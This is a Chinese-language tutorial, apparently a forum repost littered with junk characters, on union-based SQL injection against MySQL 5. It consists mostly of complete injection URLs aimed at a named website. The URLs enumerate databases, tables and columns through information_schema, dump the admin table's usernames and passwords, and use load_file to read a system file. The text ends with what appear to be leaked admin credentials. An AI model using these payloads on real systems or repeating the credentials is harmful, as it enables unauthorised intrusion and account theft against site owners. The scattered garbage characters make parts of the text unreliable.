此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似) K0 e6 ~' j" m
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人# S2 j( T& S, e) v0 }6 H
! a! K$ g$ S+ U( i& F4 b* ^6 p
* E$ @* o4 X) h+ z6 i2 Z; W I优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
; f% D) @5 y" `; S/ I b2 K9 U4 c( t7 O
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
I& X4 }# R1 g" D2 y1 K6 |
' k5 |- @) k0 Q. I下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示* B8 m$ K: r R+ }
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等- J5 E4 p+ L6 e& t# l* p1 m! O
1 E* \& `1 S: i2 E7 nhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
! b+ o5 u2 \9 R0 R; q0 y" ~* R1 y' j
+ P6 T* @+ N# a( a" L7 g读出所有库:& M/ n4 W! t' f7 I
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
7 B u6 V% V2 D: I" Q9 N7 ~, {
: P% o$ F' w4 X8 h$ a9 b' o: U/ G1 T9 F* {: L% s) d/ F
* `( x" }* ~- g* Q9 Y读出所有表:
4 d& z l# j; Dhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database(), `0 |7 T- l. E4 J+ V* T# }
/ Y* E* g% d* _1 m+ P7 t9 m) M- r+ F读出所有表字段:
, u4 ~4 F7 l+ |9 _, \8 zhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110): F+ I5 B) q# P4 m( {, b4 c8 p% v2 o& o
*/ (97,100,109,105,110)为admin的ascii码 依次类推6 W- R8 O( u8 ?6 Z
1 A3 D9 S1 P( d' A" H读出所有表字段里的内容:
4 h) d9 n% F+ O& K" X6 v% chttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin( v8 J7 l1 S2 Z0 E0 Y g9 N% w2 v& s
7 g4 i A/ _; X% e
: \& U. v' G8 C+ h6 G4 A8 F# w. b, n0 U7 Q( _7 F$ D
! Y8 |) l4 o) c
# `: \1 t4 {! f$ Z2 i9 H# `9 t! J4 H
k0 I" z* U9 L8 z' dhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%234 f, I. M( b) V0 y [3 ?3 v
& y; A4 p0 X: s& c
' X/ h8 u5 Y& P5 E2 b
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23, i) I' }9 {' ]. i$ [3 G
' ^7 ^1 _- [1 { k$ i# ~2 shttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23. I2 @3 O8 \) b( Y5 e2 H7 N: m
4 c, {, V; i% \/ K
/ U8 Z2 W; O/ W+ }# } chttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23$ c- c8 P+ Z: @) Y
+ g, x! | i- ]& e
; w3 s* S' F, } webmaster:dzb521123,simlab:simadmin20043233
' P G0 |' @8 i9 N) h( R( {. X: Z |